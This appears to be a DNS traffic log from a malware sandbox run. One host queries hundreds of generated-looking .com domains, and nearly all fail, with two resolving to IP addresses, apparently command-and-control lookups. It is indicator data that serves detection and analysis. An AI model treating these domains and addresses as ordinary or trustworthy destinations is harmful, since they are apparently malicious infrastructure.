Aug 23, 2024 18:48:50.352519035 CEST	1.1.1.1	192.168.2.4	0xb4b2	Name error (3)	pufyxug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.352529049 CEST	1.1.1.1	192.168.2.4	0x2c65	Name error (3)	qegyxug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.352540970 CEST	1.1.1.1	192.168.2.4	0xf868	Name error (3)	vojypuc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.352550030 CEST	1.1.1.1	192.168.2.4	0x573c	Name error (3)	pupylaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.353889942 CEST	1.1.1.1	192.168.2.4	0xfed6	Name error (3)	lysylej.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.355401039 CEST	1.1.1.1	192.168.2.4	0x5c20	Name error (3)	lymymud.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.361916065 CEST	1.1.1.1	192.168.2.4	0x9f0c	Name error (3)	purywop.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.479933023 CEST	1.1.1.1	192.168.2.4	0x86fd	Name error (3)	gahycib.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.483541965 CEST	1.1.1.1	192.168.2.4	0x2178	Name error (3)	pujypup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.486804962 CEST	1.1.1.1	192.168.2.4	0xdd3d	Name error (3)	puvygyq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.494748116 CEST	1.1.1.1	192.168.2.4	0x91b6	Name error (3)	volydot.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.517796040 CEST	1.1.1.1	192.168.2.4	0x3e3a	Name error (3)	lygytyd.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.518284082 CEST	1.1.1.1	192.168.2.4	0x163c	Name error (3)	qexyvoq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.519707918 CEST	1.1.1.1	192.168.2.4	0x6b23	Name error (3)	gaqyhuz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.519721985 CEST	1.1.1.1	192.168.2.4	0x6ef9	Name error (3)	vofyref.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.523876905 CEST	1.1.1.1	192.168.2.4	0xf233	Name error (3)	qeqyhup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.523978949 CEST	1.1.1.1	192.168.2.4	0x4786	Name error (3)	gadyrab.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.523996115 CEST	1.1.1.1	192.168.2.4	0x58c5	Name error (3)	pujyxyl.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.526382923 CEST	1.1.1.1	192.168.2.4	0xef20	Name error (3)	pupywog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.526393890 CEST	1.1.1.1	192.168.2.4	0x64a5	Name error (3)	pumygyp.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.526403904 CEST	1.1.1.1	192.168.2.4	0xadb9	Name error (3)	qedyrag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.526412964 CEST	1.1.1.1	192.168.2.4	0xe526	Name error (3)	lysywon.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.526422977 CEST	1.1.1.1	192.168.2.4	0xa96c	Name error (3)	ganyfes.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.526432037 CEST	1.1.1.1	192.168.2.4	0xe2ac	Name error (3)	volycik.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.526447058 CEST	1.1.1.1	192.168.2.4	0x8c65	Name error (3)	gatyqih.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.526457071 CEST	1.1.1.1	192.168.2.4	0x9403	Name error (3)	vonygec.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.526465893 CEST	1.1.1.1	192.168.2.4	0xac12	Name error (3)	galycuw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.527344942 CEST	1.1.1.1	192.168.2.4	0xbdc3	Name error (3)	qetyquq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.529339075 CEST	1.1.1.1	192.168.2.4	0x194	Name error (3)	lyvyfad.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.529350042 CEST	1.1.1.1	192.168.2.4	0x5f01	Name error (3)	puvydov.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.529357910 CEST	1.1.1.1	192.168.2.4	0xa296	Name error (3)	lyrymuj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.529371023 CEST	1.1.1.1	192.168.2.4	0x5b50	Name error (3)	qegylep.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.529926062 CEST	1.1.1.1	192.168.2.4	0x5a07	Name error (3)	gacydib.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.531910896 CEST	1.1.1.1	192.168.2.4	0x68f	Name error (3)	qexysig.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.531920910 CEST	1.1.1.1	192.168.2.4	0x7969	Name error (3)	qebyfav.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.533155918 CEST	1.1.1.1	192.168.2.4	0x6edb	Name error (3)	lyxysun.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.534387112 CEST	1.1.1.1	192.168.2.4	0xb478	Name error (3)	lymyner.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.535288095 CEST	1.1.1.1	192.168.2.4	0x5553	Name error (3)	volypum.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.535298109 CEST	1.1.1.1	192.168.2.4	0xad8c	Name error (3)	pumybal.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.536715031 CEST	1.1.1.1	192.168.2.4	0xfc52	Name error (3)	pupyjuv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.536725044 CEST	1.1.1.1	192.168.2.4	0x2a9	Name error (3)	galypyh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.536734104 CEST	1.1.1.1	192.168.2.4	0xf6a8	Name error (3)	qedykiv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.537693977 CEST	1.1.1.1	192.168.2.4	0xbc93	Name error (3)	qekytyq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.537703991 CEST	1.1.1.1	192.168.2.4	0x1c74	Name error (3)	lysyjid.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.538827896 CEST	1.1.1.1	192.168.2.4	0x4016	Name error (3)	ganyvoz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.541543961 CEST	1.1.1.1	192.168.2.4	0x23fe	Name error (3)	pufytev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.542494059 CEST	1.1.1.1	192.168.2.4	0xbf4c	Name error (3)	vowyjut.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.542504072 CEST	1.1.1.1	192.168.2.4	0x72c8	Name error (3)	qebyvop.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.543761969 CEST	1.1.1.1	192.168.2.4	0xb2cc	Name error (3)	lyvyvix.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.543771982 CEST	1.1.1.1	192.168.2.4	0x4848	Name error (3)	vojyzyt.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.543783903 CEST	1.1.1.1	192.168.2.4	0xc9e5	Name error (3)	puzypug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.543793917 CEST	1.1.1.1	192.168.2.4	0xb291	Name error (3)	puzyciq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.543803930 CEST	1.1.1.1	192.168.2.4	0xbda7	Name error (3)	lymygyx.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.544557095 CEST	1.1.1.1	192.168.2.4	0x60d8	Name error (3)	vopyqim.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.545979977 CEST	1.1.1.1	192.168.2.4	0xbbbe	Name error (3)	gahyzez.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.546648979 CEST	1.1.1.1	192.168.2.4	0x256e	Name error (3)	vocydof.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.546659946 CEST	1.1.1.1	192.168.2.4	0x6f55	Name error (3)	lykyxur.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.547365904 CEST	1.1.1.1	192.168.2.4	0x1bae	Name error (3)	purymuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.547375917 CEST	1.1.1.1	192.168.2.4	0xdbc9	Name error (3)	lygylax.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.548892975 CEST	1.1.1.1	192.168.2.4	0x907a	Name error (3)	gaqynyw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.550122023 CEST	1.1.1.1	192.168.2.4	0x2a59	Name error (3)	vowymyk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.551448107 CEST	1.1.1.1	192.168.2.4	0xcc68	Name error (3)	vofykoc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.551459074 CEST	1.1.1.1	192.168.2.4	0xcb99	Name error (3)	gadykos.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.554018021 CEST	1.1.1.1	192.168.2.4	0x329a	Name error (3)	pufylap.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.555339098 CEST	1.1.1.1	192.168.2.4	0xff24	Name error (3)	qeqynel.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.557790041 CEST	1.1.1.1	192.168.2.4	0x225c	Name error (3)	vonybat.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.560197115 CEST	1.1.1.1	192.168.2.4	0x9b8a	Name error (3)	lykytej.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.560205936 CEST	1.1.1.1	192.168.2.4	0xf4c2	Name error (3)	pujyteq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.560215950 CEST	1.1.1.1	192.168.2.4	0x8bd5	Name error (3)	qekyxul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.561486006 CEST	1.1.1.1	192.168.2.4	0xd443	Name error (3)	puvycip.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.561988115 CEST	1.1.1.1	192.168.2.4	0xfa04	Name error (3)	vopyjuf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.665371895 CEST	1.1.1.1	192.168.2.4	0x2fda	Name error (3)	lyxyvoj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.988430977 CEST	1.1.1.1	192.168.2.4	0x6e08	No error (0)	qetyhyg.com		64.225.91.73	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.989098072 CEST	1.1.1.1	192.168.2.4	0x4df3	No error (0)	gatyhub.com	pltraffic7.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 23, 2024 18:48:50.989098072 CEST	1.1.1.1	192.168.2.4	0x4df3	No error (0)	pltraffic7.com		72.52.179.174	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:51.231919050 CEST	1.1.1.1	192.168.2.4	0x34d0	No error (0)	qetyhyg.com		64.225.91.73	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:51.325865030 CEST	1.1.1.1	192.168.2.4	0xe0f4	No error (0)	gatyhub.com	pltraffic7.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 23, 2024 18:48:51.325865030 CEST	1.1.1.1	192.168.2.4	0xe0f4	No error (0)	pltraffic7.com		72.52.179.174	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.628232956 CEST	1.1.1.1	192.168.2.4	0x6683	Name error (3)	gahyraw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.629379034 CEST	1.1.1.1	192.168.2.4	0x2206	Name error (3)	lyrygyn.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.629549026 CEST	1.1.1.1	192.168.2.4	0xb2b6	Name error (3)	lygywor.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.630711079 CEST	1.1.1.1	192.168.2.4	0xa4ce	Name error (3)	vowygem.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.631103039 CEST	1.1.1.1	192.168.2.4	0x5302	Name error (3)	gacycus.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.631969929 CEST	1.1.1.1	192.168.2.4	0x17ba	Name error (3)	qexyxuv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.635217905 CEST	1.1.1.1	192.168.2.4	0xab66	Name error (3)	qedyqup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.635436058 CEST	1.1.1.1	192.168.2.4	0x823f	Name error (3)	puzyxyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.635447025 CEST	1.1.1.1	192.168.2.4	0xd957	Name error (3)	lykylan.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.635552883 CEST	1.1.1.1	192.168.2.4	0xc963	Name error (3)	lyxyxyd.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.635564089 CEST	1.1.1.1	192.168.2.4	0xc4dd	Name error (3)	volyzef.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.635572910 CEST	1.1.1.1	192.168.2.4	0x2ef1	Name error (3)	pupymyp.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.635879993 CEST	1.1.1.1	192.168.2.4	0x827f	Name error (3)	galyzeb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.635890007 CEST	1.1.1.1	192.168.2.4	0x6d96	Name error (3)	lyvysur.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.635898113 CEST	1.1.1.1	192.168.2.4	0xd0	Name error (3)	pumydoq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.635906935 CEST	1.1.1.1	192.168.2.4	0x78f2	Name error (3)	gadyquz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.635916948 CEST	1.1.1.1	192.168.2.4	0xb344	Name error (3)	gahykih.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.635926008 CEST	1.1.1.1	192.168.2.4	0xf641	Name error (3)	ganydiw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.635934114 CEST	1.1.1.1	192.168.2.4	0x2be0	Name error (3)	qebysul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.638588905 CEST	1.1.1.1	192.168.2.4	0x140	Name error (3)	pujylog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.638636112 CEST	1.1.1.1	192.168.2.4	0x361b	Name error (3)	vonydik.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.638645887 CEST	1.1.1.1	192.168.2.4	0xeaf9	Name error (3)	qexytep.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.638933897 CEST	1.1.1.1	192.168.2.4	0x4279	Name error (3)	qegykiq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.638943911 CEST	1.1.1.1	192.168.2.4	0x6cdf	Name error (3)	qetynev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.638952971 CEST	1.1.1.1	192.168.2.4	0x5ce9	Name error (3)	gaqyfah.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.638962030 CEST	1.1.1.1	192.168.2.4	0xe3c0	Name error (3)	qekylag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.638972044 CEST	1.1.1.1	192.168.2.4	0x20fe	Name error (3)	vocypyt.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.638982058 CEST	1.1.1.1	192.168.2.4	0x216	Name error (3)	purybav.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.638992071 CEST	1.1.1.1	192.168.2.4	0x3e36	Name error (3)	puvypul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.638999939 CEST	1.1.1.1	192.168.2.4	0x685c	Name error (3)	vowybof.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.639009953 CEST	1.1.1.1	192.168.2.4	0x26ea	Name error (3)	vojykom.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.639018059 CEST	1.1.1.1	192.168.2.4	0xe637	Name error (3)	volyrac.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.639029026 CEST	1.1.1.1	192.168.2.4	0xa67e	Name error (3)	lysyger.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.639044046 CEST	1.1.1.1	192.168.2.4	0xf81d	Name error (3)	pumycug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.640240908 CEST	1.1.1.1	192.168.2.4	0xebb2	Name error (3)	pupygel.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.640252113 CEST	1.1.1.1	192.168.2.4	0x40ea	Name error (3)	qedyhyl.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.640259981 CEST	1.1.1.1	192.168.2.4	0xb083	Name error (3)	lygyjuj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.640269995 CEST	1.1.1.1	192.168.2.4	0x1626	Name error (3)	vonycum.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.640279055 CEST	1.1.1.1	192.168.2.4	0x59fb	Name error (3)	lykywid.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.640289068 CEST	1.1.1.1	192.168.2.4	0xeb7	Name error (3)	lyxytex.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.640296936 CEST	1.1.1.1	192.168.2.4	0xd3b	Name error (3)	puzytap.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.640306950 CEST	1.1.1.1	192.168.2.4	0xf14e	Name error (3)	galyros.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.640315056 CEST	1.1.1.1	192.168.2.4	0xa77d	Name error (3)	vofyjuk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.641750097 CEST	1.1.1.1	192.168.2.4	0x9e85	Name error (3)	ganycuh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.641761065 CEST	1.1.1.1	192.168.2.4	0xa06d	Name error (3)	gadyhyw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.642812967 CEST	1.1.1.1	192.168.2.4	0x583d	Name error (3)	gaqyvob.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.647325039 CEST	1.1.1.1	192.168.2.4	0xfdfd	Name error (3)	vocycuc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.649316072 CEST	1.1.1.1	192.168.2.4	0xc64e	Name error (3)	qegyrol.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.653151989 CEST	1.1.1.1	192.168.2.4	0x34a4	Name error (3)	purygeg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.659465075 CEST	1.1.1.1	192.168.2.4	0xd83b	Name error (3)	pufywil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.665637970 CEST	1.1.1.1	192.168.2.4	0x9f04	Name error (3)	vopymyc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.667121887 CEST	1.1.1.1	192.168.2.4	0x41b	Name error (3)	lymyfoj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.667139053 CEST	1.1.1.1	192.168.2.4	0xe8ff	Name error (3)	qeqyfaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.667922020 CEST	1.1.1.1	192.168.2.4	0xa9ec	Name error (3)	lysymux.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.667933941 CEST	1.1.1.1	192.168.2.4	0x2d1a	Name error (3)	lyrynad.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.667943954 CEST	1.1.1.1	192.168.2.4	0x928e	Name error (3)	pufyjuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.667954922 CEST	1.1.1.1	192.168.2.4	0x5628	Name error (3)	gacypyz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.668414116 CEST	1.1.1.1	192.168.2.4	0x24af	Name error (3)	vopygat.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.668427944 CEST	1.1.1.1	192.168.2.4	0x77fa	Name error (3)	qekyrov.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.668437958 CEST	1.1.1.1	192.168.2.4	0x503a	Name error (3)	qeqyvig.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.668450117 CEST	1.1.1.1	192.168.2.4	0xa1df	Name error (3)	qebyxyq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.670871973 CEST	1.1.1.1	192.168.2.4	0x175b	Name error (3)	lymyvin.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.670886993 CEST	1.1.1.1	192.168.2.4	0x3679	Name error (3)	vofyqit.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.670897007 CEST	1.1.1.1	192.168.2.4	0xae84	Name error (3)	gatynes.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.690424919 CEST	1.1.1.1	192.168.2.4	0xb888	Name error (3)	pujywiv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.692823887 CEST	1.1.1.1	192.168.2.4	0xb404	Name error (3)	vojyquf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.692840099 CEST	1.1.1.1	192.168.2.4	0x8eb8	Name error (3)	lygymyn.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.692850113 CEST	1.1.1.1	192.168.2.4	0x2106	Name error (3)	purydip.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.693325043 CEST	1.1.1.1	192.168.2.4	0xee43	Name error (3)	qegyqug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.693336964 CEST	1.1.1.1	192.168.2.4	0xf44f	Name error (3)	vocyzek.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.695179939 CEST	1.1.1.1	192.168.2.4	0xa69e	Name error (3)	qexylal.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.695193052 CEST	1.1.1.1	192.168.2.4	0xdec1	Name error (3)	gahyqub.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.695204020 CEST	1.1.1.1	192.168.2.4	0x6ccf	Name error (3)	vowydic.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.699038029 CEST	1.1.1.1	192.168.2.4	0x100c	Name error (3)	gacyzaw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.699053049 CEST	1.1.1.1	192.168.2.4	0xfb25	Name error (3)	gaqydus.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.699062109 CEST	1.1.1.1	192.168.2.4	0xe502	Name error (3)	galykiz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.699841976 CEST	1.1.1.1	192.168.2.4	0x256c	Name error (3)	qeqysuv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.699858904 CEST	1.1.1.1	192.168.2.4	0xa3ec	Name error (3)	lysynaj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.699878931 CEST	1.1.1.1	192.168.2.4	0x569a	Name error (3)	qebyteg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.699889898 CEST	1.1.1.1	192.168.2.4	0x584d	Name error (3)	gahyhys.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.699899912 CEST	1.1.1.1	192.168.2.4	0x9146	Name error (3)	volykit.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.700112104 CEST	1.1.1.1	192.168.2.4	0x6e11	Name error (3)	puvytag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.700211048 CEST	1.1.1.1	192.168.2.4	0xa792	Name error (3)	gacyroh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.700222015 CEST	1.1.1.1	192.168.2.4	0xa439	Name error (3)	lymysud.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.700231075 CEST	1.1.1.1	192.168.2.4	0x504b	Name error (3)	lygyged.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.700824976 CEST	1.1.1.1	192.168.2.4	0xc25f	Name error (3)	vocyrom.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.701004982 CEST	1.1.1.1	192.168.2.4	0x4556	Name error (3)	qegyhev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.701015949 CEST	1.1.1.1	192.168.2.4	0x2f14	Name error (3)	gadyfob.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.701370001 CEST	1.1.1.1	192.168.2.4	0x5525	Name error (3)	qeqyxyp.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.701381922 CEST	1.1.1.1	192.168.2.4	0xe418	Name error (3)	galyquw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.701446056 CEST	1.1.1.1	192.168.2.4	0xc0d3	Name error (3)	qedyfog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.701457024 CEST	1.1.1.1	192.168.2.4	0xdb2	Name error (3)	puzywuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.701466084 CEST	1.1.1.1	192.168.2.4	0xbbb2	Name error (3)	volyquk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.701807022 CEST	1.1.1.1	192.168.2.4	0x9ea3	Name error (3)	pufygav.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.701817036 CEST	1.1.1.1	192.168.2.4	0x3215	Name error (3)	vofygaf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.718672991 CEST	1.1.1.1	192.168.2.4	0x46fe	Name error (3)	vowycut.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.718692064 CEST	1.1.1.1	192.168.2.4	0xca27	Name error (3)	lysyfin.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.718702078 CEST	1.1.1.1	192.168.2.4	0x3317	Name error (3)	vonyzac.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.718949080 CEST	1.1.1.1	192.168.2.4	0xc347	Name error (3)	lykyjux.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.718961954 CEST	1.1.1.1	192.168.2.4	0xbcb8	Name error (3)	gatyfaz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.718971968 CEST	1.1.1.1	192.168.2.4	0x5646	Name error (3)	lyvyxyj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.718981981 CEST	1.1.1.1	192.168.2.4	0x2719	Name error (3)	puvyxeq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.720104933 CEST	1.1.1.1	192.168.2.4	0xc2c3	Name error (3)	lyxylor.com	none	none	A (IP address)	IN (0x0001)	false
